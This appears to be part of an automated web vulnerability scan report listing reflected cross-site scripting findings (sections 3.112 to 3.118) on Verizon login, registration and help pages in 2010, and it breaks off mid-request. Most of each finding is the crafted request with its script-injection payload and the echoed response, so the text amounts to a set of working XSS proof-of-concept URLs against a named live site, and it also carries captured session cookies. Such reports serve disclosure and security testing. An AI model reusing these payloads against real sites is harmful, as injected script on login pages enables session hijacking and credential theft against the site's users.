HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA14V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 00:54:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:54:22 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=85ff4439-03f7-4614-a14f-6076686da86b; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6cf45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 00:59:22 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47385


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>450552b46bf=130dd7<script>alert(1)</script>5e4c65629c4" name="target">
...[SNIP]...

3.112. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 194d1<script>alert(1)</script>6bba43a7f86 was submitted in the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1194d1<script>alert(1)</script>6bba43a7f86 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www22.verizon.com
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 00:55:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:55:10 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:00:10 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47430


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1194d1<script>alert(1)</script>6bba43a7f86" name="target">
...[SNIP]...

3.113. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3828e"><script>alert(1)</script>450552b46bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>450552b46bf=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: 03A02V
Content-Type: text/html; charset=utf-8
Content-Length: 47344
Expires: Sat, 20 Nov 2010 00:16:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:50 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=8258b46e-23bd-41ac-b0a6-3b65ca36843c; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6bf45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&3828e"><script>alert(1)</script>450552b46bf=1" name="target">
...[SNIP]...

3.114. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a916'-alert(1)-'a4883ee17a5 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F4a916'-alert(1)-'a4883ee17a5 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; CP=null*; myservices=vzdock=N; refURL=http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Expires: Sat, 20 Nov 2010 02:14:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:14:42 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:19:42 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 133609

<SCRIPT language=javascript>function checkforempty()
           {    

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
ipt">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https%3A%2F%2Fwww22%2Everizon%2Ecom%2Fmyverizon%2Fmessages%2Frouter%2F4a916'-alert(1)-'a4883ee17a5';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();
}
...[SNIP]...

3.115. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdc9f'-alert(1)-'ea90d6efe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?bdc9f'-alert(1)-'ea90d6efe28=1 HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; CMS_TimeZoneOffset=360; CP=null*; refURL=http://www22.verizon.com/residentialhelp/; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Expires: Sat, 20 Nov 2010 02:13:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:13:50 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:18:50 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 133536

<SCRIPT language=javascript>function checkforempty()
           {    

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...
<script language="javascript" type="text/javascript">

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?bdc9f'-alert(1)-'ea90d6efe28=1';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();

...[SNIP]...

3.116. http://www22.verizon.com/Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm [bannerid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the bannerid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d47"%3b6993170f2f3 was submitted in the bannerid parameter. This input was echoed as 55d47";6993170f2f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm?bannerid=BannerDry1m55d47"%3b6993170f2f3 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64661
Expires: Sat, 20 Nov 2010 00:09:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet | Check Availability
</title><meta name="keywords" content="how to get verizon high speed internet, order verizon high
...[SNIP]...
<script language ="javascript">

// for check Availabiltity
var BannerID = "BannerDry1m55d47";6993170f2f3";    
var xmlSource = "<PROMOBANNERS>
...[SNIP]...

3.117. https://www22.verizon.com/ForYourHome/FTTPRepair/vziha/ihamain.aspx [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/FTTPRepair/vziha/ihamain.aspx

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b710b"><script>alert(1)</script>55aa320ee52 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForYourHome/FTTPRepair/vziha/ihamain.aspx?keyword=WebVoiceMailb710b"><script>alert(1)</script>55aa320ee52 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 2407
Expires: Sat, 20 Nov 2010 02:39:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:39:02 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VZ In Home Agent</title>
<link rel="stylesheet" href="./hnm/css/isupport.css" type="text/css" />
<link rel="stylesheet" h
...[SNIP]...
<input type="hidden" name="my1stKeyWord" id="my1stKeyWord" value="WebVoiceMailb710b"><script>alert(1)</script>55aa320ee52"/>
...[SNIP]...

3.118. https://www22.verizon.com/ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx [FlowRoute parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx

Issue detail

The value of the FlowRoute request parameter is copied into a JavaScript rest-of-line comment. The payload 89a05%0aalert(1)//cc561db1e96 was submitted in the FlowRoute parameter. This input was echoed as 89a05
alert(1)//cc561db1e96
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ForYourHome/GoFlow/MyVerizon/Registrationbridge.aspx?FlowRoute=NB-NS89a05%0aalert(1)//cc561db1e96 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; 